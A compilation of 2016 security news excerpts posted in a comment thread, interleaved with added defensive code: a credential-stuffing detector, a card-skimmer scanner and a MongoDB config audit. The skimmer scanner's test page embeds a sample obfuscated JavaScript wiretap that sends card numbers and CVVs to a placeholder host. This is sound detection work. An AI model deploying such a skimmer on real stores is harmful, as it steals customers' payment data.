2FA costs skyrocket when extra hardware such as hard tokens or biometric scanners are involved. In response to this challenge, the ubiquity of mobile devices certainly positions them as a logical platform for granting 2FA. But, the recent National Institute of Standards and Technology (NIST) recommendation against the use of SMS tokens for 2FA means that older non-smart phones aren’t preferable for this purpose, which excludes a significant portion of the population using older technology. Additionally, the authentication method in use should be usable across multiple mediums – whether banking online, on the phone or in person.
2FA is becoming more mainstream for businesses; however, businesses need to consider how 2FA should be implemented to maintain both external and internal control. According to a recent Ponemon Institute Research Report, “75 percent of respondents say a single-factor authentication approach, including username and password, can no longer effectively prevent unauthorized access to information resources.”
Tomi Engdahl says:
Moscow Says U.S. Hacking Claims ‘Flattering’, But False
http://www.securityweek.com/moscow-says-us-hacking-claims-flattering-false
Russian Foreign Minister Sergei Lavrov on Wednesday said that US claims Moscow is meddling in the American election process are “flattering” but baseless.
Lavrov shrugged off US allegations that Russia has directed cyber attacks against American political organizations in a bid to influence the November 8 vote.
“It’s flattering of course to get this kind of attention for a regional power, as President Obama called us some time ago,” Lavrov told CNN.
“Now everybody in the United States is saying that it is Russia which is running the (US) presidential debate.”
But Lavrov insisted that there is not a “single fact, a single proof” to back Washington’s accusations.
President Vladimir Putin also struck back at Washington on Wednesday.
Tomi Engdahl says:
Endpoint Security Wars: Is Peace Breaking Out?
http://www.securityweek.com/endpoint-security-wars-peace-breaking-out
In May 2016 VirusTotal (VT) changed its rules. Any vendor wishing to receive antivirus results via the VT API would in future be required to integrate its own detection scanner into the public VT interface. Furthermore, such vendors would need to be certified by The Anti-Malware Testing Standards Organization (AMTSO).
Tomi Engdahl says:
Microsoft Patches 4 Vulnerabilities Exploited in the Wild
http://www.securityweek.com/microsoft-patches-4-vulnerabilities-exploited-wild
Microsoft’s latest security bulletins patch tens of vulnerabilities affecting the company’s products. Four of the 36 unique CVE identifiers cover flaws that have been exploited in the wild.
One of the zero-day vulnerabilities, tracked as CVE-2016-3298, has been described by Microsoft as an information disclosure issue affecting Internet Explorer.
Another zero-day, identified as CVE-2016-7189, affects the Edge web browser and it can be exploited for remote code execution by getting the victim to access a malicious website.
The third flaw exploited in the wild, CVE-2016-3393, is a Windows graphics (GDI) component issue that can be leveraged to remotely execute arbitrary code and gain control of the affected system.
The last zero-day patched by Microsoft this week affects Office and it can be exploited for remote code execution via specially crafted RTF files.
Tomi Engdahl says:
Junos OS CLI has a bad bug. So good luck applying its new patches
Gin palace has eight bug-killing shots for you to imbibe
http://www.theregister.co.uk/2016/10/13/juniper_networks_emits_a_bunch_of_bugfixes/
Juniper user? Feeling smug because you didn’t have to race to download the latest Cisco patch round? Sorry: Juniper has just emitted eight vulnerability patches of its own.
Let’s start with this advisory, since it’s rated critical.
The Junos Space network management system has a crop of vulnerabilities, some of which are remotely exploitable. Version 15.2R2 splats bugs including authentication bugs, badly-validated SSH keys, a cross-site request forgery vulnerability, command injection, cross-site scripting and XML injection.
The patches cover various Mozilla components, DHCP services, a Xen x86 emulator bug from last year, 2013′s “Motochopper” bug, OpenSSL bugs and more.
2016-10 Security Bulletin: Junos Space: Multiple vulnerabilities
https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10760&cat=SIRT_1&actp=LIST
Tomi Engdahl says:
This month’s critical Flash vulnerability gives attackers control of a Mac …
https://9to5mac.com/2016/10/12/critical-flash-vulnerability-mac/
You can check your current version of Flash
If it’s not 23.0.0.185, you need to upgrade urgently
Check version at http://www.adobe.com/software/flash/about/?sdid=XKMMHJ2P
Tomi Engdahl says:
Could Determined Hackers Change the Outcome of the Election?
http://www.designnews.com/author.asp?section_id=1395&doc_id=281795&cid=nl.x.dn14.edt.aud.dn.20161013.tst004c
It would be difficult and highly unlikely, but it’s certainly possible for computer hackers to change the outcome of next month’s presidential election, experts say.
“I’m not sure that a single hacker could do it alone,” Eugene H. Spafford, professor of computer science at Purdue University, told Design News. “But an organized team that’s well financed and has enough time could in fact change the outcome of the election.”
Concern over potential security threats has grown in the last few months in the wake of attacks by Russian hackers on voter databases in Illinois and Arizona. In the Illinois attack, the personal information of approximately 200,000 voters was hacked. In Arizona, hackers stole the user name and password of at least one election official earlier this year.
Security experts who have testified before Congress say there’s reason for concern. Dan S. Wallach, a professor of computer science at Rice University, recently told a House sub-committee that “our election systems face credible cyber-threats; it’s prudent to adopt contingency plans before November to mitigate these threats.”
Spafford told us that it wouldn’t take a major effort to introduce confusion and chaos into the November election. “All the hackers would have to do is make it look as if tampering had occurred,” he said. “In a close election, it could cause controversy, lawsuits, and other problems. Look at the after-effects of the hanging chad in 2000. We’re still talking about it 16 years later.”
Experts strongly encouraged election districts around the country to use touch screen machines connected to printers that can create a paper trail. Unfortunately, voting districts in about a dozen states have no such machines.
The most vulnerable systems, however, are the voter registration databases, and the machines that count and report the votes. If registrations are removed from those databases, voters could be unable to cast ballots.
Polling place voting machines are a more difficult target for hackers, largely because those machines typically employ an “air gap” — that is, a physical separation from the Internet. Still, cyber experts are concerned with the possible entrance of malware.
“Those of us who have studied it believe that old-fashioned paper is still the best solution,” he told us. “Having a paper trail that people can look at and count is really important.”
Tomi Engdahl says:
The Cyber Risk of Mixing Business with Pleasure
http://www.securityweek.com/cyber-risk-mixing-business-pleasure
Technical and Process Controls for the Enterprise Must Extend to Employees and How They Engage in Personal Services
The ubiquitous use of social media has blurred the lines between business and personal lives. A lot has been written about the importance of keeping the two separate, with an emphasis on the potential risk to an individual’s reputation
But there’s another important reason why separating business from pleasure should be a concern – the potential for increased cyber risk to your business stemming from credential compromise to social media accounts.
Barely a week goes by without reports of a leaked database. At the same time, dumps of stolen credentials are regularly sold, traded and shared online across paste sites, file-sharing sites and online marketplaces. Credential compromise is not new, but how these credentials become available is often directly related to the lack of separation between business and pleasure.
Employees who have reused corporate emails and passwords for personal use can put their employers at risk of account takeovers, credential stuffing and extortion attempts.
Threat actors can automatically inject breached username and password pairs in order to fraudulently gain access to user accounts. This technique, known as credential stuffing, is a type of brute force attack whereby large sets of credentials are automatically inputted into websites until a match with an existing account is found.
Extortion attempts
Users received extortion emails threatening to share the exposed information
Set policies
• Establish a policy for which external services are allowed to be associated to corporate email accounts.
• Understand and monitor approved external services for password policies and formats to understand the risks and lowest common denominators.
Monitor activity
• Proactively monitor for credential dumps relevant to your organization’s accounts and evaluate these dumps to determine if the dumps are new or have been previously leaked, in which case you may have already addressed the matter.
• If you have any user behavior analytics capabilities, import compromised identity information and look for any suspicious activity (e.g., accessing resources that have not been accessed in the past.)
Educate employees
• Update security awareness training to include the risks associated with password reuse.
• Encourage staff to use consumer password management tools like 1Password or LastPass to also manage personal account credentials.
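The “monitor activity” bullets above are a procedure: watch for credential dumps that mention your domain, discard the ones you have already handled, and look for the takeover attempts that follow. The following is an added example, not code from SecurityWeek or the column’s author, that does both over constructed data: it triages a paste in the usual `email:password` format (keeping only a SHA-256 fingerprint of each pair so the tracking store never holds cleartext passwords) and then flags credential stuffing in an authentication log, defined here as one source IP trying many distinct accounts in a short window with a high failure rate. The domain, the log format, the thresholds and every address in the samples are assumptions.

```python
"""Credential-dump triage and credential-stuffing detection (added example, not from the article)."""
import hashlib
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Set, Tuple

CORP_DOMAIN = "example.com"  # assumption: the organisation's mail domain

# Constructed sample paste in the common "email:password" format (not real data)
SAMPLE_DUMP = """\
alice@example.com:Summer2016!
bob@gmail.com:hunter2
carol@example.com:Passw0rd
alice@example.com:Summer2016!
dave@EXAMPLE.com:qwerty
not a credential line
"""


def fingerprint(email: str, password: str) -> str:
    """SHA-256 of the pair so the 'already handled' store never contains cleartext passwords."""
    return hashlib.sha256(("%s:%s" % (email.lower(), password)).encode()).hexdigest()


def triage_dump(text: str, domain: str, already_seen: Set[str]) -> List[Tuple[str, str]]:
    """Return (email, fingerprint) for corporate accounts whose pair has not been handled before."""
    new = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        email, password = line.split(":", 1)
        email = email.strip().lower()
        if not email.endswith("@" + domain):
            continue
        fp = fingerprint(email, password)
        if fp in already_seen:
            continue  # the same leak re-posted; password already reset, user already told
        already_seen.add(fp)
        new.append((email, fp))
    return new


# Constructed authentication log (not real data): one IP walks through many usernames
# and gets a single hit; a legitimate user mistypes once and then logs in.
SAMPLE_AUTH_LOG = """\
2016-10-13T09:00:01 ip=203.0.113.9 user=alice@example.com result=fail
2016-10-13T09:00:02 ip=203.0.113.9 user=bob@example.com result=fail
2016-10-13T09:00:02 ip=203.0.113.9 user=carol@example.com result=ok
2016-10-13T09:00:03 ip=203.0.113.9 user=dave@example.com result=fail
2016-10-13T09:00:03 ip=203.0.113.9 user=erin@example.com result=fail
2016-10-13T09:00:04 ip=203.0.113.9 user=frank@example.com result=fail
2016-10-13T09:01:10 ip=198.51.100.7 user=alice@example.com result=fail
2016-10-13T09:01:25 ip=198.51.100.7 user=alice@example.com result=ok
"""
LOG_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<res>ok|fail)$")


def detect_credential_stuffing(log_text: str, window_minutes: int = 5, min_users: int = 5,
                               min_fail_ratio: float = 0.7) -> Dict[str, Tuple[int, int, int]]:
    """Flag source IPs that try at least min_users distinct accounts inside the window with a
    failure rate of at least min_fail_ratio. Returns {ip: (distinct_users, failures, attempts)}
    for the largest window that tripped the rule."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%S")
        per_ip[m.group("ip")].append((ts, m.group("user"), m.group("res")))
    window = timedelta(minutes=window_minutes)
    flagged: Dict[str, Tuple[int, int, int]] = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding window over the IP's attempts
            while events[end][0] - events[start][0] > window:
                start += 1
            win = events[start:end + 1]
            users = {u for _, u, _ in win}
            fails = sum(1 for _, _, r in win if r == "fail")
            if len(users) >= min_users and fails / len(win) >= min_fail_ratio:
                flagged[ip] = (len(users), fails, len(win))
    return flagged


if __name__ == "__main__":
    handled: Set[str] = set()
    for email, fp in triage_dump(SAMPLE_DUMP, CORP_DOMAIN, handled):
        print("new exposure:", email, fp[:12])
    print(detect_credential_stuffing(SAMPLE_AUTH_LOG))
```

The interesting line in the sample log is the single `result=ok` inside the stuffing burst: that is the account takeover the column warns about, and the account (not the attacker’s IP) is what needs the password reset and the behaviour-analytics follow-up.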
Tomi Engdahl says:
Want Better Security? Be a Pragmatist.
http://www.securityweek.com/want-better-security-be-pragmatist
I’ve always considered myself a pragmatist. Perhaps not surprisingly, I have also always been a big fan of pragmatism. I guess one goes along with the other. A pragmatist is defined as “a person who is oriented toward the success or failure of a particular line of action, thought, etc.; a practical person.” Aside from being a useful worldview, I would argue that being a pragmatist is the only way to improve the security posture of an organization. How can I make such a statement? Allow me to explain.
Perfect security on the portal is never going to happen. So, let’s boil it down to its essence. The security professional faces two choices:
1. Be a pragmatist, work collaboratively with the business to understand constraints and priorities, and focus on how security can be improved within that framework, or…
2. Be an ideologue, don’t seek to understand the constraints and priorities of the business, and demand changes that will not fit within the framework that the business is operating in.
Which approach do you think will land better results?
Whether we’re working on securing an enterprise, looking to gain visibility and response capability during a move to the cloud, trying to make software more secure, improving the security of web applications, building a security operations and incident response program, or any of the other important undertakings in the security field, we need to work as a partner and an advisor to the business. Time and time again, this has shown itself to be the only proven way to make progress toward the end goal of improving the organization’s security posture.
The modern security practitioner needs to be a pragmatist that works with the business to improve security without negatively impacting the business. Now, more than ever before
We’ve been so busy with ideology that we’ve forgotten to focus on what’s important — our end goals and the outcomes we desire. Most business people understand risk mitigation quite well. You’d be surprised what happens when you work collaboratively with the business. Educating the business about the risks and threats they face and constructively helping them to work towards mitigating those risks and threats has been repeatedly proven to improve security in practice.
Tomi Engdahl says:
Preparing for a cyber attack
An incident response (IR) plan is a vital component of cybersecurity strategy.
http://www.controleng.com/single-article/preparing-for-a-cyber-attack/94a0925cf7af1b782a258cca73791bc0.html?OCVALIDATE&ocid=101781
What was once an afterthought for oil and gas organizations, cybersecurity is now center stage. Cybersecurity impacts every facet of oil and gas operations, which are now more digital and connected than ever. As such, chief information security officers (CISO) understand that attacks are inevitable, and what counts today is how organizations respond to threats and their overall level of cyber-readiness.
Cybersecurity has similar traits to physical security. Many people have an alarm system in their house, not to prevent a break-in from occurring, but to immediately alert the house’s occupants, and authorities, when one happens. Further, while everything in a home may have value, the most valuable items are frequently stored in a safe for added protection.
Organizations are beginning to think about cybersecurity in the same way. As threats become more sophisticated, companies must acknowledge that attacks can’t necessarily be prevented, but fast response time and a secure environment for the most critical data and assets are key to building a strong cybersecurity position.
Cybersecurity attacks on energy organizations are more targeted than other industries, causing costly damage to operational technology (OT) environments. With an increasing number of connected devices and two very unique operating environments—IT and OT—the oil and gas sector’s greatest challenge is to establish clear and informative guidelines for people and processes during a cyber attack.
Despite having an incident response (IR) plan in place, very few oil and gas organizations run through full simulation exercises of this plan. Simulated exercises can reveal incorrect assumptions made during the IR process and also alert security leaders to gaping holes
Tomi Engdahl says:
Almost 6,000 online shops hit by hackers
http://www.bbc.com/news/technology-37643754
Almost 6,000 web shops are unknowingly harbouring malicious code that is stealing the credit card details of customers, suggests research.
The code has been injected into the sites by cyberthieves, said Dutch developer Willem De Groot.
He found the 5,925 compromised sites by scanning for the specific signature of the data-stealing code in website software.
Some of the stolen data was sent to servers based in Russia, he said.
Costly mistake
In a blogpost, Mr De Groot said the attacks exploited known vulnerabilities in several different widely used web retailing programs. Mr De Groot is co-founder and head of security at Dutch ecommerce site byte.nl
Having won access, the attackers injected a short chunk of obfuscated code that copied credit card and other payment information. Stolen data was being sold on dark web markets at a rate of about $30 (£25) per card, he said.
His research found nine separate types of skimming code on sites, suggesting many different crime groups were involved.
“I would recommend consumers to only enter their payment details on sites of known payment providers such as Paypal,” he told the BBC. “They have hundreds of people working on security, the average store probably has none.”
5900 online stores found skimming [analysis]
https://gwillem.github.io/2016/10/11/5900-online-stores-found-skimming/
Online skimming is just like physical skimming: your card details are stolen so that other people can spend your money. However, online skimming is more effective because a) it is harder to detect and b) it is near impossible to trace the thieves.
In short: hackers gain access to a store’s source code using various unpatched software flaws. Once a store is under control of a perpetrator, a (Javascript) wiretap is installed that funnels live payment data to an off-shore collection server (mostly in Russia). This wiretap operates transparently for customers and the merchant. Skimmed credit cards are then sold on the dark web for the going rate of $30 per card.
Online skimming gains popularity
Online skimming is a new form of card fraud. In November 2015, the first case was reported. Upon investigating, I scanned a sample of 255K online stores globally and found 3501 stores to be skimmed.
Victims vary from car makers (Audi ZA) to government (NRSC, Malaysia) to fashion (Converse, Heels.com), to pop stars (Bjork) to NGOs (Science Museum, Washington Cathedral).
754 stores that are skimming today were already skimming in 2015. Apparently you can skim cards undisturbed for months.
Today, at least 9 varieties and 3 distinct malware families can be identified
Replies from worried merchants
I have manually reported several compromised shops and got some curious responses:
We don’t care, our payments are handled by a 3rd party payment provider
If someone can inject Javascript into your site, your database is most likely also hacked.
Thanks for your suggestion, but our shop is totally safe. There is just an annoying javascript error.
Or, even better:
Our shop is safe because we use https
Solutions
New cases could be stopped right away if store owners would upgrade their software regularly. But this is costly and most merchants don’t bother.
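De Groot found the compromised shops by scanning for the signature of the injected code. The following is an added example, not his scanner and not code from the BBC or from byte.nl: a heuristic check of one checkout page that collects every `<script>`, decodes `\xNN`-escaped strings, and flags an inline script that is obfuscated and either reads card fields or sends data out, plus any external script loaded from a host outside the shop’s allowlist. The page URL, the allowlist, the regexes and the sample page with its injected wiretap are all constructed assumptions; a real scan would fetch the live checkout page and tune the patterns to the families seen in the wild.

```python
"""Heuristic scan of a checkout page for injected card-skimming JavaScript
(added example, not the scanner from the article)."""
import re
from html.parser import HTMLParser
from typing import List, Optional, Set, Tuple
from urllib.parse import urlparse

# Assumed indicators; real skimmer families need their own signatures.
OBFUSCATION = re.compile(r"fromCharCode|atob\(|unescape\(|eval\(|document\.write\(", re.I)
HEX_RUN = re.compile(r"(\\x[0-9a-f]{2}){8,}", re.I)  # long \xNN-escaped string literals
PAYMENT_FIELDS = re.compile(r"cc_?number|card_?number|cvv|cvc|expir|cardholder", re.I)
EXFIL = re.compile(r"new Image\(\)|\.src\s*=|XMLHttpRequest|sendBeacon|fetch\(", re.I)


def decode_hex_escapes(js: str) -> str:
    """Turn "\x63\x76\x76" back into "cvv" so field names hidden by escaping are visible."""
    return re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), js)


class ScriptCollector(HTMLParser):
    """Collect every <script> as (src attribute or None, inline body)."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Tuple[Optional[str], str]] = []
        self._src: Optional[str] = None
        self._buf: Optional[List[str]] = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def scan_checkout_html(html: str, page_url: str, allowed_hosts: Set[str]) -> List[Tuple[int, str]]:
    """Return (script_index, reason) for scripts that look like a wiretap or an unexpected loader."""
    page_host = urlparse(page_url).hostname
    collector = ScriptCollector()
    collector.feed(html)
    findings: List[Tuple[int, str]] = []
    for idx, (src, body) in enumerate(collector.scripts):
        if src:
            host = urlparse(src).hostname  # None for relative URLs, i.e. same origin
            if host and host != page_host and host not in allowed_hosts:
                findings.append((idx, "external script from unexpected host " + host))
            continue
        decoded = decode_hex_escapes(body)
        obfuscated = bool(OBFUSCATION.search(body) or HEX_RUN.search(body))
        touches_card = bool(PAYMENT_FIELDS.search(decoded))
        sends_out = bool(EXFIL.search(decoded))
        if obfuscated and (touches_card or sends_out):
            why = [w for w, hit in (("obfuscated", obfuscated), ("reads card fields", touches_card),
                                    ("sends data out", sends_out)) if hit]
            findings.append((idx, "possible skimmer: " + ", ".join(why)))
    return findings


# Constructed checkout page: two legitimate scripts, one legitimate inline validator,
# one injected wiretap that reads cc_number/cvv via hex-escaped names and posts them
# to an outside host, and one extra loader from that host.
PAGE_URL = "https://shop.example/checkout"
ALLOWED_HOSTS = {"cdn.example"}  # assumption: the shop's own CDN
SAMPLE_HTML = r"""<html><body>
<script src="/js/jquery.js"></script>
<script src="https://cdn.example/app.js"></script>
<script>document.getElementById('card_number').addEventListener('input', formatCard);</script>
<form id="pay"><input name="cc_number"><input name="cvv"></form>
<script>var _0x=["\x63\x63\x5f\x6e\x75\x6d\x62\x65\x72","\x63\x76\x76"];document.forms[0].onsubmit=function(){var d="";for(var i=0;i<_0x.length;i++){d+=document.getElementsByName(_0x[i])[0].value+"|";}(new Image()).src="http://203.0.113.55/g.php?d="+btoa(d);};</script>
<script src="http://203.0.113.55/stat.js"></script>
</body></html>"""

if __name__ == "__main__":
    for index, reason in scan_checkout_html(SAMPLE_HTML, PAGE_URL, ALLOWED_HOSTS):
        print("script #%d: %s" % (index, reason))
```

The legitimate validator that names `card_number` is not flagged because it is not obfuscated; the wiretap is flagged even though its field names are hidden, because they are decoded before matching. This is triage, not proof: the merchants’ replies quoted above (“our payments are handled by a third party”, “we use https”) miss that the script runs in the customer’s browser before anything reaches the payment provider, and TLS protects the connection to the shop, not against code the shop itself serves.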
Tomi Engdahl says:
The IT sector discovered security insurance: “it is not worth paying for unnecessary protection”
The first cyber security insurance in Finland was brought by the American insurance company AIG, starting in 2013. Secondly, the Nordic insurance company If P&C followed about a year and a half ago.
“Sales of security insurance have picked up all the time,” says If’s product manager Tapio Valtonen.
According to him, the policyholders are in particular retailers, IT companies and professional services such as accounting and consultancy firms.
Security insurance typically reimburses the costs caused by a data breach: investigating its causes and effects and restoring the data. Insurance can also cover business interruption losses.
Demand may be accelerated by the EU’s new Data Protection Regulation. It requires companies to specifically address the security of personal data and, in the event of a breach, for example, to notify the data protection authority of the breach. Insurance can cover the additional costs brought about by the application of the Regulation.
Source: http://www.tivi.fi/Kaikki_uutiset/it-ala-loysi-tietoturvavakuutukset-tarpeettomasta-turvasta-ei-kannata-maksaa-6590628
Tomi Engdahl says:
Washington Post:
Verizon general counsel says there’s a “reasonable basis” to believe Yahoo hack will have a “material” impact on deal — Verizon on Thursday said that it was leaning toward declaring as a “material” event the massive data breach disclosed three weeks ago by Yahoo …
Verizon just raised a big warning flag for Yahoo
https://www.washingtonpost.com/news/the-switch/wp/2016/10/13/verizon-just-raised-a-big-warning-flag-for-yahoo/
Verizon on Thursday signaled that Yahoo’s massive data breach disclosed three weeks ago was a significant event that could halt the telecom giant’s $4.8 billion purchase of the tech firm’s core business.
“I think we have a reasonable basis to believe right now that the impact is material,” Verizon General Counsel Craig Silliman said of the breach, speaking to a small group of reporters at a roundtable. A “material” effect in this case is one that would harm Yahoo’s financial value, and make the Web giant less attractive to purchase.
Now, revelations of Verizon’s internal deliberations threaten to cast an even bigger cloud over Yahoo’s future.
The deal between Verizon and Yahoo is currently expected to close in the first quarter. Verizon said that the burden is on Yahoo to prove that the breach hasn’t damaged its value. “We’re looking to Yahoo to demonstrate to us the full impact they believe it’s not,” Silliman said. If Verizon concludes the breach had a material impact on Yahoo’s business, then a key condition of the deal would not be met, he said. Analysts say that could trigger an escape clause in the agreement to allow the telecom company to back out of the deal.
Yahoo said it discovered the breach, the largest recorded in history, in August. The firm said it occurred in 2014 and affected at least 500 million user accounts.
Tomi Engdahl says:
Efe Kerem Sozeri / The Daily Dot:
How hacktivist group RedHack subverted the Turkish government’s notorious censorship tactics in order to release a government email archive
How hacktivist group RedHack gamed Turkey’s censorship regime
http://www.dailydot.com/layer8/redhack-gamed-turkey-censorship/
The Turkish government’s plan to hide a massive email leak completely backfired.
The Turkish government blocked Google Drive, Dropbox, OneDrive and even Github to stop leaked emails of Energy Minister, Berat Albayrak, from spreading further—exactly how the hackers behind the email leak expected them to react, allowing them to spread the leak further using the Streisand Effect.
The Daily Dot previously reported that the Marxist hacktivist group, RedHack, has compromised the private email accounts of Minister Albayrak—Turkish President Recep Tayyip Erdoğan’s son-in-law—and leaked the 17GB email archive to a group of journalists, including the Daily Dot.
Two days ago, when Cemil Uğur, a reporter from the leftist daily Evrensel, was imprisoned for “making propaganda for an illegal organisation,” RedHack threatened to leak the email archive publicly if Uğur and other jailed reporters were not released within a day. After the deadline, the group followed through on its threat.
To overcome the Turkish government’s notorious censorship, the hacker group diversified sources, including with links on StackOverflow profiles and in the deep halls of the Internet Archive —prompting the Turkish government to ban them all one by one, including blocking the “archive.org” domain and banning access to the Wayback Machine along the way.
But RedHack said they calculated the most impact by uploading the torrent file to GitHub, forcing the Turkish government into a hard choice between blocking the world’s biggest source-code repository or facing the fact that the leak would be available to the public.
Within four hours of the leak, Turkey’s internet authority decided to issue a nationwide block on GitHub, which was lifted approximately 18 hours later—a period long enough to make headlines all around the world. Meanwhile, the content that RedHack uploaded to GitHub was not removed at all; instead, the group is now uploading screenshots of emails to further circumvent Turkey’s censorship.
The ban on Google Drive was also lifted after 15 hours despite the re-uploaded torrent file still being accessible. The block on Dropbox has also been lifted.
While the Google Drive access problems halted many corporate services inside Turkey, the block on GitHub had collateral damages for the general public as well. For example, websites using Font Awesome were not displaying their content properly, and MacOS package manager system Homebrew was reportedly not working.
(“After cloud-based systems, #github is also blocked. Is this a joke? If we are trying to wipe out start-ups, we are on the right track”)
At the end of the day, all of Turkey’s blocking attempts to stop the world’s leading cloud services seemed to be in vain, as RedHack kept sharing the torrent file and magnet link that points to the 10.9GB compressed (.rar) archive of the email dump on all possible platforms, which was then downloaded and seeded by hundreds of people inside Turkey and abroad.
The Turkish government’s increasing control of the domestic media is rightfully concerning. But its attempts to control the online world are evidently a failure when groups such as RedHack know how to turn the tables.
Tomi Engdahl says:
Facebook’s un-Liked ~900 security flaws in five years
The Social Network™ has slung more than US$5m to bounty hunters
http://www.theregister.co.uk/2016/10/14/facebook_bug_bounty_squashes_900_falws/
Facebook has paid security researchers US$5million in five years, after they found vulnerabilities in its platforms and quietly disclosed them under its bug bounty program.
The Social Network™ runs a well-oiled bounty program and pays generously when it receives notice of flaws and working proof-of-concepts, provided they are not already public or used in attacks against users.
Security engineer Joey Tyson says the money went to about 900 researchers with an average payout of US$5,556.
“Launching and running a program of this size for five years is not easy, and we couldn’t have done it without the support of the broader security research community,” Tyson says.
Tomi Engdahl says:
‘Pork Explosion’ flaw splatters Foxconn’s Android phones
Full compromise over USB bacon-ed in to smartmobes
http://www.theregister.co.uk/2016/10/14/pork_explosion_foxconn_flaw/
Security researcher John Sawyer says a limited backdoor has been found in some Foxconn-manufactured Android phones, allowing attackers to root phones they have in hand.
The backdoor is the result of a debugging function left over in Foxconn apps bootloader code which can be exploited by attackers wielding appropriate software.
Sawyer badges the vulnerability a result of “great neglect” by Foxconn.
Those attackers will have complete control over the devices having bypassed SELinux Android security controls, and gained access without the need of authentication.
The vulnerability, dubbed “Pork Explosion” (a salvo to over-hyped flaws bearing names, websites, and logos), is most useful to forensics boffins wanting to pull data from the unspecified list of affected handsets in which the low level Foxconn code exists.
Tomi Engdahl says:
Modern Business Solutions Stumbles Over A Modern Business Problem – 58M Records Dumped From An Unsecured Database
https://www.riskbasedsecurity.com/2016/10/modern-business-solutions-stumbles-over-a-modern-business-problem-58m-records-dumped-from-an-unsecured-database/
Much has been written about the dangers of poorly secured MongoDB databases among others. Despite the many warnings, millions of records have been lost due to misconfigurations in this database software. Now yet another massive database leak has been uncovered related to an insecure MongoDB installation, exposing at least 58 million subscriber records.
Twitter user @0x2Taylor posted exfiltrated data on the file sharing site MEGA twice over the weekend, each time resulting in the data being taken down very quickly. The data was then released for a third time on a smaller file sharing website. After analyzing the dataset, we can confirm that nearly 58 million records containing full names, IP addresses, dates of birth, email addresses, vehicle data, and occupations were included in the leak.
While the data itself is easy enough to read, identifying the owner of the database has been more challenging. Nothing within the dumped dataset itself pointed to who might be responsible for the information.
Researchers were able to confirm it was an open MongoDB installation and identify the owner as Modern Business Solutions. Working with Databreaches.net, Modern Business Solutions was contacted and made aware of the issue. Although neither RBS nor Databreaches.net have yet received a reply from Modern Business Solutions, the database has since been secured and is no longer accessible.
Wait, 58M Records Or 258M?!
Shortly after discovering the ownership, our researchers received a curious update from 0x2Taylor. New information emerged indicating an additional table had been identified, containing 258 million rows of personal data. The data was presented in a similar format as the original leak.
It is unclear how much data from this second table may have been compromised.
Putting The Breach In Context
There have been 2,928 publicly disclosed data breaches so far this year, exposing more than 2.2 billion records. While 2.2 billion is a big number, RBS research indicates 55% of the breaches taking place in the first half of 2016 exposed 10,000 or fewer records. Unfortunately, some of the most notable “mega-breach” exceptions have come from misconfigured databases. With so much media attention given to mysterious “Russian hackers” or the more general “state sponsored actors”, it can be easy to lose sight of the fact that some of the largest and most damaging breaches have nothing to do with the nebulous “advanced persistent threat”. Rather, they can be attributed to weak controls, poor management practices or under-resourced staff.
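The RBS write-up above blames the leak on an "open MongoDB installation", which in practice means a listener bound to every interface with authorization switched off. The script below is an added example, not code from RBS or from the MongoDB project: it writes two constructed `mongod.conf` files (the weak configuration beside the corrected one) and runs a small audit over them that flags exactly those two settings. The `net.bindIp`, `net.bindIpAll` and `security.authorization` keys are real MongoDB options; the file names and values are made up for the demonstration.

```shell
#!/bin/sh
# Added example: audit a mongod.conf for the two settings behind most
# "open MongoDB" leaks. Both config files are constructed samples.
set -e
WORK=$(mktemp -d)

cat > "$WORK/weak.conf" <<'EOF'
# constructed sample: reachable from any interface, no authentication
net:
  port: 27017
  bindIp: 0.0.0.0
security:
  authorization: disabled
EOF

cat > "$WORK/hardened.conf" <<'EOF'
# constructed sample: loopback only, role-based authentication required
net:
  port: 27017
  bindIp: 127.0.0.1,::1
security:
  authorization: enabled
EOF

# audit_mongod_conf FILE
# Prints one FAIL line per finding and returns 0 only when the file is clean.
# Tracks the top-level YAML section so "bindIp" is read only under "net".
audit_mongod_conf() {
    awk '
        /^[^ #]/ { section = $1; sub(/:$/, "", section); next }
        section == "net" && $1 == "bindIp:"              { bind = $2 }
        section == "net" && $1 == "bindIpAll:"           { bindall = $2 }
        section == "security" && $1 == "authorization:"  { auth = $2 }
        END {
            fails = 0
            if (auth != "enabled") {
                print "FAIL security.authorization is not enabled (any client that can connect can read every database)"
                fails++
            }
            if (bindall == "true") {
                print "FAIL net.bindIpAll is true"
                fails++
            } else if (bind == "") {
                print "FAIL net.bindIp is not set (releases before 3.6 listened on all interfaces by default)"
                fails++
            } else {
                n = split(bind, addrs, ",")
                for (i = 1; i <= n; i++)
                    if (addrs[i] == "0.0.0.0" || addrs[i] == "::") {
                        print "FAIL net.bindIp includes the wildcard address " addrs[i]
                        fails++
                    }
            }
            exit fails > 0
        }' "$1"
}

for name in weak hardened; do
    if audit_mongod_conf "$WORK/$name.conf"; then
        echo "$name.conf: clean"
    else
        echo "$name.conf: exposed"
    fi
done
```

Run it as-is and the weak file produces two FAIL lines while the hardened one passes; pointing `audit_mongod_conf` at a real `/etc/mongod.conf` gives a quick pre-deployment check that does not depend on scanning the host from outside.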
Tomi Engdahl says:
GlobalSign Error Causes Widespread Internet Issues
https://it.slashdot.org/story/16/10/13/192239/globalsign-error-causes-widespread-internet-issues
GlobalSign, one of the root CAs globally, has ‘inadvertently revoked its intermediary certificates while updating a special cross-certificate. This smashed the chain of trust and ultimately nullified sites’ SSL/TLS certificates. It could take days to fix, leaving folks unable to easily read their favorite webpages.’ The issue may take up to four days to resolve itself.
GlobalSign screw-up cancels top websites’ HTTPS certificates
Revoked certs may linger for days, locking people out of sites
http://www.theregister.co.uk/2016/10/13/globalsigned_off/
GlobalSign’s efforts as a root certificate authority have gone TITSUP this afternoon – that’s a total inability to support usual protocols.
